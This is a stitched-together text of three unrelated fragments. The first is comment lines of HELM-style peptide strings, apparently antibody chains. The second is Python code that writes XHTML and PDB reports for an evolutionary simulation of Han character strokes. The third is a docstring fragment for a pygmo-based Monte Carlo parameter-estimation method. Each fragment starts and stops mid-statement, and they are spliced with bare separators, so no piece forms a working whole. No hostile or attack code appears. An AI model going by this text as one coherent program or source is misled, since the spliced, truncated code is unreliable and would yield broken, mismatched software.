# P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.
# L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.
# E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.G.E.C}|PEPTIDE2{Q.V.Q.L.V.Q.S.G.A.E.V.K.K.P.G.A.
# S.V.K.V.S.C.K.A.S.G.Y.T.F.T.N.S.W.I.G.W.F.R.Q.A.P.G.Q.G.L.E.W.I.G.D.I.Y.P.G.G.G.Y.
# T.N.Y.N.E.I.F.K.G.K.A.T.M.T.A.D.T.S.T.N.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V.Y.Y.C.S.R.
# G.I.P.G.Y.A.M.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.
# T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.
# Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.
# D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.
# V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.
# V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.
# R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.
# G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.
# S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{Q.V.Q.L.V.Q.S.G.A.E.V.K.K.P.
# G.A.S.V.K.V.S.C.K.A.S.G.Y.T.F.T.N.S.W.I.G.W.F.R.Q.A.P.G.Q.G.L.E.W.I.G.D.I.Y.P.G.G.
# G.Y.T.N.Y.N.E.I.F.K.G.K.A.T.M.T.A.D.T.S.T.N.T.A.Y.M.E.L.S.S.L.R.S.E.D.T.A.V.Y.Y.C.
# S.R.G.I.P.G.Y.A.M.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P.L.A.P.S.S.K.S.T.S.
# G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H.T.F.P.A.V.L.Q.S.S.
# G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T.K.V.D.K.K.V.E.P.K.
# S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T.L.M.I.S.R.T.P.E.V.
# T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.
# R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I.E.K.T.I.S.K.A.K.G.
# Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y.P.S.D.I.A.V.E.W.E.
# S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.
# S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE4{D.I.Q.M.T.Q.R.P.D.S.L.S.
# A.S.V.G.D.R.V.T.M.S.C.K.S.S.Q.S.L.L.N.S.G.D.Q.K.N.Y.L.T.W.Y.Q.Q.K.P.G.Q.P.P.K.L.L.
# I.Y.W.A.S.T.G.E.S.G.V.P.D.R.F.S.G.S.G.S.G.T.D.F.T.F.T.I.S.S.L.Q.P.E.D.I.A.T.Y.Y.C.
# Q.N.D.Y.S.Y.P.W.T.F.G.Q.G.T.K.V.E.I.K.R.T.V.A.A.P.S.V.F.I.F.P.P.S.D.E.Q.L.K.S.G.T.
# A.S.V.V.C.L.L.N.N.F.Y.P.R.E.A.K.V.Q.W.K.V.D.N.A.L.Q.S.G.N.S.Q.E.S.V.T.E.Q.D.S.K.D.
# S.T.Y.S.L.S.S.T.L.T.L.S.K.A.D.Y.E.K.H.K.V.Y.A.C.E.V.T.H.Q.G.L.S.S.P.V.T.K.S.F.N.R.
# G.E.C}$PEPTIDE1,PEPTIDE1,140:R3-200:R3|PEPTIDE3,PEPTIDE3,145:R3-201:R3|PEPTIDE2,PE
# PTIDE2,22:R3-96:R3|PEPTIDE2,PEPTIDE3,230:R3-230:R3|PEPTIDE2,PEPTIDE2,262:R3-322:R3
# |PEPTIDE4,PEPTIDE4,140:R3-200:R3|PEPTIDE3,PEPTIDE4,221:R3-220:R3|PEPTIDE4,PEPTIDE4
# ,23:R3-94:R3|PEPTIDE3,PEPTIDE3,22:R3-96:R3|PEPTIDE2,PEPTIDE3,227:R3-227:R3|PEPTIDE
# 3,PEPTIDE3,262:R3-322:R3|PEPTIDE2,PEPTIDE1,221:R3-220:R3|PEPTIDE2,PEPTIDE2,145:R3-
# 201:R3|PEPTIDE1,PEPTIDE1,23:R3-94:R3|PEPTIDE2,PEPTIDE2,368:R3-426:R3|PEPTIDE3,PEPT
# IDE3,368:R3-426:R3$$$' , 'PEPTIDE1{Q.S.V.L.T.Q.P.P.S.A.S.G.T.P.G.Q.R.V.T.I.S.C.S.G
# .S.N.T.N.I.G.K.N.Y.V.S.W.Y.Q.Q.L.P.G.T.A.P.K.L.L.I.Y.A.N.S.N.R.P.S.G.V.P.D.R.F.S.G
# .S.K.S.G.T.S.A.S.L.A.I.S.G.L.R.S.E.D.E.A.D.Y.Y.C.A.S.W.D.A.S.L.N.G.W.V.F.G.G.G.T.K
# .L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L.F.P.P.S.S.E.E.L.Q.A.N.K.A.T.L.V.C.L.I.S.D.F.Y.P.G.A
# .V.T.V.A.W.K.A.D.S.S.P.V.K.A.G.V.E.T.T.T.P.S.K.Q.S.N.N.K.Y.A.A.S.S.Y.L.S.L.T.P.E.Q
# .W.K.S.H.R.S.Y.S.C.Q.V.T.H.E.G.S.T.V.E.K.T.V.A.P.T.E.C.S}|PEPTIDE2{E.V.Q.L.L.E.S.G
# .G.G.L.V.Q.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.N.A.W.M.S.W.V.R.Q.A.P.G.K.G.L.E.W.V.S
# .S.I.S.V.G.G.H.R.T.Y.Y.A.D.S.V.K.G.R.S.T.I.S.R.D.N.S.K.N.T.L.Y.L.Q.M.N.S.L.R.A.E.D
# .T.A.V.Y.Y.C.A.R.I.R.V.G.P.S.G.G.A.F.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G.P.S.V.F.P
# .L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L.T.S.G.V.H
# .T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H.K.P.S.N.T
# .K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P.K.P.K.D.T
# .L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N.A.K.T.K.P
# .R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A.L.P.A.P.I
# .E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L.V.K.G.F.Y
# .P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K.L.T.V.D.K
# .S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPTIDE3{E.V.Q
# .L.L.E.S.G.G.G.L.V.Q.P.G.G.S.L.R.L.S.C.A.A.S.G.F.T.F.S.N.A.W.M.S.W.V.R.Q.A.P.G.K.G
# .L.E.W.V.S.S.I.S.V.G.G.H.R.T.Y.Y.A.D.S.V.K.G.R.S.T.I.S.R.D.N.S.K.N.T.L.Y.L.Q.M.N.S
# .L.R.A.E.D.T.A.V.Y.Y.C.A.R.I.R.V.G.P.S.G.G.A.F.D.Y.W.G.Q.G.T.L.V.T.V.S.S.A.S.T.K.G
# .P.S.V.F.P.L.A.P.S.S.K.S.T.S.G.G.T.A.A.L.G.C.L.V.K.D.Y.F.P.E.P.V.T.V.S.W.N.S.G.A.L
# .T.S.G.V.H.T.F.P.A.V.L.Q.S.S.G.L.Y.S.L.S.S.V.V.T.V.P.S.S.S.L.G.T.Q.T.Y.I.C.N.V.N.H
# .K.P.S.N.T.K.V.D.K.K.V.E.P.K.S.C.D.K.T.H.T.C.P.P.C.P.A.P.E.L.L.G.G.P.S.V.F.L.F.P.P
# .K.P.K.D.T.L.M.I.S.R.T.P.E.V.T.C.V.V.V.D.V.S.H.E.D.P.E.V.K.F.N.W.Y.V.D.G.V.E.V.H.N
# .A.K.T.K.P.R.E.E.Q.Y.N.S.T.Y.R.V.V.S.V.L.T.V.L.H.Q.D.W.L.N.G.K.E.Y.K.C.K.V.S.N.K.A
# .L.P.A.P.I.E.K.T.I.S.K.A.K.G.Q.P.R.E.P.Q.V.Y.T.L.P.P.S.R.D.E.L.T.K.N.Q.V.S.L.T.C.L
# .V.K.G.F.Y.P.S.D.I.A.V.E.W.E.S.N.G.Q.P.E.N.N.Y.K.T.T.P.P.V.L.D.S.D.G.S.F.F.L.Y.S.K
# .L.T.V.D.K.S.R.W.Q.Q.G.N.V.F.S.C.S.V.M.H.E.A.L.H.N.H.Y.T.Q.K.S.L.S.L.S.P.G.K}|PEPT
# IDE4{Q.S.V.L.T.Q.P.P.S.A.S.G.T.P.G.Q.R.V.T.I.S.C.S.G.S.N.T.N.I.G.K.N.Y.V.S.W.Y.Q.Q
# .L.P.G.T.A.P.K.L.L.I.Y.A.N.S.N.R.P.S.G.V.P.D.R.F.S.G.S.K.S.G.T.S.A.S.L.A.I.S.G.L.R
# .S.E.D.E.A.D.Y.Y.C.A.S.W.D.A.S.L.N.G.W.V.F.G.G.G.T.K.L.T.V.L.G.Q.P.K.A.A.P.S.V.T.L
# | |
= min(iStrokeStart + Constants.dStrokeRangesPerLine, len(aryStrokes))
strStrokeDetails += "<table class='stroke-range'><tr><th>Stroke</th>%s</tr><tr><th>Bases</th>%s</tr><tr><th>Han #</th>%s</tr></table>" % (
''.join([ '<td><a href="#s%d">%d</a></td>' % (i, i+1) for i in range(iStrokeStart,iStrokeEnd) ]),
''.join([ '<td><a href="#s%d">%04d—%04d</a></td>' % (i, aryStrokes[i].rgBases.baseFirst, aryStrokes[i].rgBases.baseLast) for i in range(iStrokeStart,iStrokeEnd) ]),
''.join([ '<td>%d</td>' % aryStrokes[i].correspondsTo for i in range(iStrokeStart,iStrokeEnd) ]))
strDigits = ' '.join([ '%d%d%d' % (i%10,(i+1)%10,(i+2)%10) for i in range(1,Constants.dBasesPerLine,3) ])
strCodonTable = ''
if not genome.codonTable.isStandard():
strCodonTable += '<h3>Codon Table - %s</h3>' % genome.codonTable.uuid
aryEntries = genome.codonTable.entries()
for iEntryRow in range(0,len(aryEntries),Constants.dCodonTableEntriesPerLine):
aryEntriesRow = aryEntries[iEntryRow:iEntryRow+Constants.dCodonTableEntriesPerLine]
strCodonTableRow = ''
for iEntrySet in range(0,len(aryEntriesRow),Constants.dCodonTableEntriesPerSet):
aryEntriesSet = aryEntriesRow[iEntrySet:iEntrySet+Constants.dCodonTableEntriesPerSet]
strCodonTableRow += "<td><table class='codon-row'><tr><td>%s</td><td>%s</td><td>%s</td><td>%s</td></tr>" % (aryEntriesSet[0][0], aryEntriesSet[1][0], aryEntriesSet[2][0], aryEntriesSet[3][0])
strCodonTableRow += "<tr><td class='%s'>%s</td><td class='%s'>%s</td><td class='%s'>%s</td><td class='%s'>%s</td></tr></table></td>" % (
(genome.codonTable.hasStandardMapping(aryEntriesSet[0][0]) and 'acids' or 'acid-nonstandard'),
aryEntriesSet[0][1],
(genome.codonTable.hasStandardMapping(aryEntriesSet[1][0]) and 'acids' or 'acid-nonstandard'),
aryEntriesSet[1][1],
(genome.codonTable.hasStandardMapping(aryEntriesSet[2][0]) and 'acids' or 'acid-nonstandard'),
aryEntriesSet[2][1],
(genome.codonTable.hasStandardMapping(aryEntriesSet[3][0]) and 'acids' or 'acid-nonstandard'),
aryEntriesSet[3][1])
strCodonTable += "<table class='codon-table'>%s</table>" % strCodonTableRow
iStroke = 0
strCodonDetails = ''
for i in range(0,len(genome.bases),Constants.dBasesPerLine):
bases = genome.bases[i:i+Constants.dBasesPerLine]
aryCodons = Codons.Constants.reSPLITCODONS.findall(bases)
aryVectors = list(map(genome.codonTable.codonToVectorName, aryCodons))
nBases = len(aryCodons) * 3
while iStroke < len(aryStrokes):
stroke = aryStrokes[iStroke]
iBase = stroke.rgBases.baseFirst - i - 1
if iBase < nBases:
iCodon = max(int(iBase/3),0)
aryCodons[iCodon] = ('<span id="s%d" class="stroke-range">' % iStroke) + aryCodons[iCodon]
iBase = stroke.rgBases.baseLast - i - 1
if iBase >= 0 and iBase < nBases:
iCodon = int(iBase/3)
aryCodons[iCodon] += '</span>'
iStroke += 1
else:
break
strCodonDetails += _HTML_TRIAL_CODON_ROW % (i+1, i+Constants.dBasesPerLine,
strDigits,
' '.join(aryCodons),
' '.join(aryVectors))
return (cBases, cStrokeBases, strStrokeDetails, strCodonTable, strCodonDetails)
#------------------------------------------------------------------------------
# Function: buildXHTML
#
# Generate XHTML output
#------------------------------------------------------------------------------
def buildXHTML(aryData, strUnicode, han):
Common.say('Creating XHTML output', False)
aryTrials = [ [ os.path.splitext(os.path.basename(strData))[0]+'.html', genome ] for strData, genome in aryData ]
# Build hyperlink path from the genome down
strDefaultNavigation = ' '
strTrialNavigation = ' '
aryPathNavigation = []
strPath = Globals.names.idGenome
if Globals.names.pathExpandReport:
strPath = os.path.join(strPath, Globals.names.pathExpandReport)
strTail = os.path.split(strPath)[1]
nDepth = 0
while strPath:
strPath, strDir = os.path.split(strPath)
aryPath = [ '..' for i in range(nDepth) ]
aryPath.append('default.html')
aryPathNavigation.append('<a class="pathpart" href="%s">%s</a>' % (os.path.join(*aryPath), strDir))
nDepth += 1
aryPathNavigation.append(' ')
aryPathNavigation.reverse()
strDefaultNavigation = '/'.join(aryPathNavigation[:-1])
if not Globals.names.strExpand:
strDefaultNavigation = '%s%s' % ( '<span class="sibling-prev"> </span><span class="sibling-down"> </span><span class="sibling-next"> </span>',
'/'.join([ strDefaultNavigation, ('<span class="pathpart">%s</span>' % strTail) ]))
else:
strDefaultNavigation = '%s%s' % ( '<span class="sibling-prev"> </span><span class="sibling-down"> </span><span class="sibling-next"> </span>',
'/'.join([ strDefaultNavigation, ('<a class="pathpart" href="../%s.html">%s</a>' % (strTail, strTail)) ]))
strTrialNavigation = '/'.join(aryPathNavigation)
# Build the default HTML file
fileDefault = None
genome = aryTrials[-1][1]
statistics = genome.statistics
fileDefault = open(os.path.join(Globals.names.pathReport, 'default.html'), 'w')
fileDefault.write(_HTML_HEADER % (statistics.trialFirst, statistics.trialLast))
strDate, strTime = genome.creationDate and genome.creationDate.split('T') or [ '', '' ]
strAuthor = genome.author or ''
if genome.creationTool:
strCreationTool = genome.creationTool + (genome.creationParameters and (' — ' + genome.creationParameters) or '')
strAuthor += strAuthor and (' (%s)' % strCreationTool) or strCreationTool
fileDefault.write(_HTML_TITLE_SECTION % (strUnicode,
statistics.trialFirst, statistics.trialLast,
strDate, strTime[:-1], strAuthor,
strDefaultNavigation))
fileDefault.write(_HTML_HEADER_SECTION % (statistics.fitness,
statistics.maxFitness.value, statistics.maxFitness.trial,
statistics.minFitness.value, statistics.minFitness.trial,
statistics.score,
statistics.maxScore.value, statistics.maxScore.trial,
statistics.minScore.value, statistics.minScore.trial,
statistics.totalRollbacks,
statistics.maxRollbacks.countRollbacks, statistics.maxRollbacks.trial,
statistics.minRollbacks.countRollbacks, statistics.minRollbacks.trial,
statistics.changeMutations.accepted, statistics.changeMutations.silent,
statistics.copyMutations.accepted,
statistics.deletionMutations.accepted,
statistics.insertionMutations.accepted,
statistics.transposeMutations.accepted))
strIcons = ''
iDefaultSVG = 0
for iTrialFirst in range(0, len(aryTrials), Constants.cDefaultIcons):
nIcons = min(len(aryTrials) - (Constants.cDefaultIcons * iDefaultSVG), Constants.cDefaultIcons)
dxRow = ((Constants.dxDefault + Constants.dxDefaultBorder) * nIcons) - Constants.dxDefaultBorder
iTrialLast = min(iTrialFirst+Constants.cDefaultIcons, len(aryTrials))
strLinks = '\n'.join([ '<th><a href="%s">%d–%d</a></th>' % (aryTrials[i][0], aryTrials[i][1].statistics.trialFirst, aryTrials[i][1].statistics.trialLast) for i in range(iTrialFirst,iTrialLast) ])
strIcons += _HTML_DEFAULT_ROW % (strLinks, nIcons, dxRow, Constants.dyDefault, 'default%d.svg' % iDefaultSVG)
iDefaultSVG += 1
fileDefault.write(_HTML_DEFAULT_MAIN % strIcons)
fileDefault.write(_HTML_FOOTER)
for iTrial in range(len(aryTrials)):
strTrial = aryTrials[iTrial][0]
genome = aryTrials[iTrial][1]
gene = genome.gene
statistics = genome.statistics
fileTrial = open(os.path.join(Globals.names.pathReport, strTrial), 'w')
fileTrial.write(_HTML_HEADER % ((not statistics and -1 or statistics.trialFirst), (not statistics and -1 or statistics.trialLast)))
strTrialPrev = iTrial > 1 and ('<a class="sibling-prev" href="%s">«%s</a>' % (aryTrials[iTrial-1][0], Common.Constants.reTRIALFILE.match(aryTrials[iTrial-1][0]).groups()[0])) or (iTrial == 1 and '<a class="sibling-prev" href="initial.html">«initial</a>' or '<span class="sibling-prev"> </span>')
strTrialNext = iTrial == len(aryTrials)-1 and '<span class="sibling-next"> </span>' or (iTrial == len(aryTrials)-2 and '<a class="sibling-next" href="final.html">final»</a>' or ('<a class="sibling-next" href="%s">%s»</a>' % (aryTrials[iTrial+1][0], Common.Constants.reTRIALFILE.match(aryTrials[iTrial+1][0]).groups()[0])))
strDate, strTime = genome.creationDate and genome.creationDate.split('T') or [ '', '' ]
strAuthor = genome.author or ''
if genome.creationTool:
strCreationTool = genome.creationTool + (genome.creationParameters and (' — ' + genome.creationParameters) or '')
strAuthor += strAuthor and (' (%s)' % strCreationTool) or strCreationTool
fileTrial.write(_HTML_TITLE_SECTION % (strUnicode,
(not statistics and -1 or statistics.trialFirst),
(not statistics and -1 or statistics.trialLast),
strDate, strTime[:-1], strAuthor,
'%s%s%s%s' % (strTrialPrev, '<script type="text/javascript">document.write(getExpandedLink());</script>', strTrialNext, '/'.join([ strTrialNavigation, os.path.splitext(strTrial)[0] ]))))
if statistics:
fileTrial.write(_HTML_HEADER_SECTION % (statistics.fitness or 0,
statistics.maxFitness and statistics.maxFitness.value or 0,
not statistics.maxFitness and -1 or statistics.maxFitness.trial,
statistics.minFitness and statistics.minFitness.value or 0,
not statistics.minFitness and -1 or statistics.minFitness.trial,
statistics.score or 0,
statistics.maxScore and statistics.maxScore.value or 0,
not statistics.maxScore and -1 or statistics.maxScore.trial,
statistics.minScore and statistics.minScore.value or 0,
not statistics.minScore and -1 or statistics.minScore.trial,
statistics.totalRollbacks or 0,
statistics.maxRollbacks and statistics.maxRollbacks.countRollbacks or 0,
not statistics.maxRollbacks and -1 or statistics.maxRollbacks.trial,
statistics.minRollbacks and statistics.minRollbacks.countRollbacks or 0,
not statistics.minRollbacks and -1 or statistics.minRollbacks.trial,
statistics.changeMutations and statistics.changeMutations.accepted or 0,
statistics.changeMutations and statistics.changeMutations.silent or 0,
statistics.copyMutations and statistics.copyMutations.accepted or 0,
statistics.deletionMutations and statistics.deletionMutations.accepted or 0,
statistics.insertionMutations and statistics.insertionMutations.accepted or 0,
statistics.transposeMutations and statistics.transposeMutations.accepted or 0))
else:
fileTrial.write(_HTML_HEADER_SECTION % (0, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, 0, -1, 0, -1, 0, 0, 0, 0, 0, 0))
strSVG = _HTML_TRIAL_ROW % ('svg', 'svg',
Globals.fHTMLSVG and '-' or '+',
'Gene',
_HTML_TRIAL_CANVAS % ('svg',
Globals.fHTMLSVG and 'block; border: none;' or 'none; border: none;',
'<embed id="svg" width="%d" height="%d" src="%s" />' % (Constants.dxTrial, Constants.dyTrial, os.path.splitext(strTrial)[0] + '.svg')))
strScores = ''
if gene.score:
strScores = _HTML_TRIAL_ROW % ('scores', 'scores',
Globals.fHTMLScores and '-' or '+',
'Scores',
_HTML_TRIAL_CANVAS % ('scores',
Globals.fHTMLScores and 'block' or 'none',
_HTML_TRIAL_SCORES % (statistics.fitness, statistics.countBases, statistics.units,
gene.score, gene.scale or 0, gene.placement or 0, gene.illegalOverlaps or 0, gene.missingOverlaps or 0, gene.marks or 0,
'\n'.join([ _HTML_TRIAL_GROUP_SCORE % (g.score or 0, g.deviation or 0, g.extraLength or 0, g.scale or 0, g.placement or 0, g.illegalOverlaps or 0, g.missingOverlaps or 0, g.dropouts or 0) for g in gene.aryGroups ]),
'\n'.join([ _HTML_TRIAL_STROKE_SCORE % (s.deviation or 0, s.extraLength or 0, s.dropouts or 0) for s in gene.aryStrokes]))))
strMutations = ''
if genome.lineage and (genome.lineage.acceptedMutations or genome.lineage.rejectedMutations):
strMutations = _HTML_TRIAL_ROW % ('mutations', 'mutations',
Globals.fHTMLMutations and '-' or '+',
'Mutations',
_HTML_TRIAL_CANVAS % ('mutations',
Globals.fHTMLMutations and 'block' or 'none',
'<h3>Accepted</h3><ol>%s</ol><div class="rejected"><h3>Rejected - %d</h3>%s</div>' % (
genome.lineage.acceptedMutations and '\n'.join([ '<li>%s</li>' % str(m) for m in genome.lineage.acceptedMutations.mutations ]) or '',
len(genome.lineage.rejectedMutations),
'\n'.join([ '<div class="reject" style="background-color: %s;"><h4>%s</h4><ol>%s</ol></div>' % (
(i % 2) and '#fff' or '#eee',
genome.lineage.rejectedMutations[i].description,
'\n'.join([ '<li>%s</li>' % str(m) for m in genome.lineage.rejectedMutations[i].mutations ])) for i in range(len(genome.lineage.rejectedMutations)) ]))))
cBases, cStrokeBases, strStrokeDetails, strCodonTable, strCodonDetails = htmlCollectCodons(genome)
strCodons = _HTML_TRIAL_ROW % ('codons', 'codons',
Globals.fHTMLCodons and '-' or '+',
'Codons',
_HTML_TRIAL_CANVAS % ('codons',
Globals.fHTMLCodons and 'block' or 'none',
_HTML_TRIAL_CODONS % (cBases, (cBases / 3), cStrokeBases, (cStrokeBases / 3), (cBases-cStrokeBases), ((cBases-cStrokeBases) / 3), len(genome.gene.aryStrokes), strStrokeDetails, strCodonTable, strCodonDetails)))
fileTrial.write(_HTML_TRIAL_MAIN % ('%s%s%s%s' % (strSVG, strScores, strMutations, strCodons)))
fileTrial.close()
Common.say('.', False)
buildExpandedLists(aryData)
Common.say('')
buildSVG(aryData, han, False)
return
#------------------------------------------------------------------------------
# Function: buildPDB
#
# Generate PDB output
#------------------------------------------------------------------------------
def buildPDB(aryData):
Common.say('Creating PDB output for trials %s' % ','.join([ str(iTrial) for iTrial in Globals.aryPDB[0] ]))
iData = 0
Globals.aryPDB[0].sort(Common.cmpDataFilenames)
nPitch = Globals.aryPDB[1]
nScale = Globals.aryPDB[2]
for strTrial in Globals.aryPDB[0]:
strTrialFile = (strTrial != 'initial' and strTrial != 'final' and ('trial' + strTrial) or strTrial) + '.xml'
while iData < len(aryData):
nCmp = Common.cmpDataFilenames(strTrialFile, os.path.basename(aryData[iData][0]))
if nCmp <= 0:
break;
iData += 1
if iData >= len(aryData) or nCmp < 0:
Common.sayError('Skipping PDB creation for %s - %s is not a valid trial' % (strTrial, strTrial))
continue
Common.say('Creating PDB file for trial %s' % strTrial)
urlGenome, genome = aryData[iData]
filePDB = open(os.path.join(Globals.names.pathReport, os.path.splitext(os.path.basename(urlGenome))[0]+'.pdb'), 'w')
filePDB.write(_PDB_HEADER)
filePDB.write(_PDB_TITLE % "")
if genome.statistics and genome.statistics.trialLast:
filePDB.write(_PDB_TITLE % ('Trial %d created on %s' % (genome.statistics.trialLast, genome.creationDate or 'unknown')))
if genome.author:
filePDB.write(_PDB_AUTHOR % genome.author)
filePDB.write('\n')
filePDB.write(_PDB_REMARK4)
filePDB.write('\n')
filePDB.write(_PDB_ORIG)
filePDB.write(_PDB_SCALE)
filePDB.write('\n')
aryHETATM = []
aryCONECT = []
iSerial = 1
z = 0
for segment in genome.gene.arySegments:
if segment.coherent:
cChain = 'c'
zIncrement = 0
else:
cChain = 'i'
zIncrement = nPitch
iChain = 1
for pt in segment.aryPoints:
aryHETATM.append(_PDB_HETATM % (iSerial, cChain, iChain, (pt.x * nScale), (pt.y * nScale), (z * | |
: str
The metric according to which the loss to be minimized is calculated.
Can be one of, e.g. `negLL` (negative log-likelihood), 'SS' (sum of squares), or `WSS` (weighted sum of squares).
Default is `negLL`, which implies that the corresponding Measurement objects are accordingly specified.
report_level : int
Enables informative output about the estimation process.
Default is 0, which is no output.
1 = Prints a dot for each processing batch, the total runtime and the ratio of samples that reached convergence.
2 = Prints likewise for 1, but with more information on each batch.
3 = Prints additionally the runtime of each batch, as well as as summary for the obtained parameter distributions.
4 = Prints additionally the reason for a MS sample to finish (i.e.,
whether convergence or the maximum number of evolutions was reached).
5 = Prints additionally information on the creation of the archipelagos for each batch
6 = Prints additionally the current evolution for each MC samples, and report any handled integration error.
optimizers : List[str] or str
A list of names for the pygmo optimization algorithms of choice. For a list of such to be conveniently used,
see `PygmoOptimizers` class of this module.
In case a list with one item is used, this optimizer is used for all explicitly
or implicitly (default None of `n_islands`) defined nunmber islands.
In case a list with >1 optimizers is used, the corresponding number of islands will be created within the archipelago.
The currently supported list of optimizer can be found at pyfoomb.generalized_islands.PygmoOptimizers.optimizers
Default is `de1220`, which makes each island to use this algorithm.
optimizers_kwargs : List[dict] or dict
A list of optimizer_kwargs as dicts, corresponding to the list of optimizers.
In case more >1 optimizers are used, the 1-item list of optimizer_kwargs will be applied to all of the optimizers.
Default is `{}`, i.e. no additional optimizer kwargs.
rel_pop_size : float
Determines the population size on each island, relative to the number of unknown to be estimated,
i.e. pop_size = rel_pop_size * len(unknowns), rounded to the next integer.
Default is 10, which creates population sizes 10 times the number of unknowns.
evolutions : int
Defines how often the populations on the islands are evolved.
Migrations between the populations of the islands occur after each finished evolution.
Migration depends of the topology of the archipelago, as well as the defined migration polices,
which are parts of `archipelago_kwargs`.
Default is 5, which triggers five rounds of evolution.
archipelago_kwargs : dict
The keyword arguments for instantiation of the archipelago.
In case `archipelago_kwargs` has no key `t`, the `pygmo.fully_connected()` topology will be used
Default is {}, i.e. an empty dictionary, which implies the use of `pygmo.fully_connected()` topology.
atol_islands : float
Defines a stopping criterion that is checked after each evolution.
If the std of the islands' losses < atol_islands + rtol_islands * abs(mean(islands' losses)), then the optimization is stopped.
Default is None, which implies no effect for this argument.
rtol_islands : float
Defines a stopping criterion that is checked after each evolution.
If the std of the islands' losses < atol_islands + rtol_islands * abs(mean(islands' losses)), then the optimization is stopped.
Default is 1e-6.
n_islands : int
Specifies the number of parallel estimations per MC samples for all archipelagos in an estimation batch.
In case a list of optimizers is provided, the number of islands is implicitly defined by its length.
Must use values > 1.
Default is 4.
handle_CVodeError : bool
Catches CVodeError raised by the solver, in order to not interrupt the estimations for toxic parameter values.
Default is True.
loss_calculator : LossCalculator
By subclassing `LossCalculator`, user-defined constraints can be implemented. The resulting subclass needs to be provided.
Default is LossCalculator, which implements no additional constraints
jobs_to_save : int
Set to repeatedly run the specifified number of MC samples and to save the results from each repeat to file.
Default is None, which causes no result storage ti file.
max_memory_share : float
Defines the allowed memory share in usage, for which no repeats are run anymore. Has only effect if `jobs_to_save` is not None.
Default is 0.95, meaning that repeat are only run if used memory share is less than 95 %.
Returns
-------
estimates : pandas.DataFrame
The values from repeated estimation for the requested unknowns.
Only converged estimations are included.
Raises
------
AttributeError
Measurements have no errors.
ValueError
Degree of archipelago parallelization is < 2.
TypeError
A list containing not only Measurement objects is provided.
KeyError:
Non-unique unknowns detected.
ValueError:
Invalid parameters shall be estimated.
"""
if jobs_to_save is None:
_estimate = self._estimate_parallel_MC_sampling(
unknowns=unknowns,
measurements=measurements,
bounds=bounds,
mc_samples=mc_samples,
reuse_errors_as_weights=reuse_errors_as_weights,
metric=metric,
report_level=report_level,
optimizers=optimizers,
optimizers_kwargs=optimizers_kwargs,
rel_pop_size=rel_pop_size,
evolutions=evolutions,
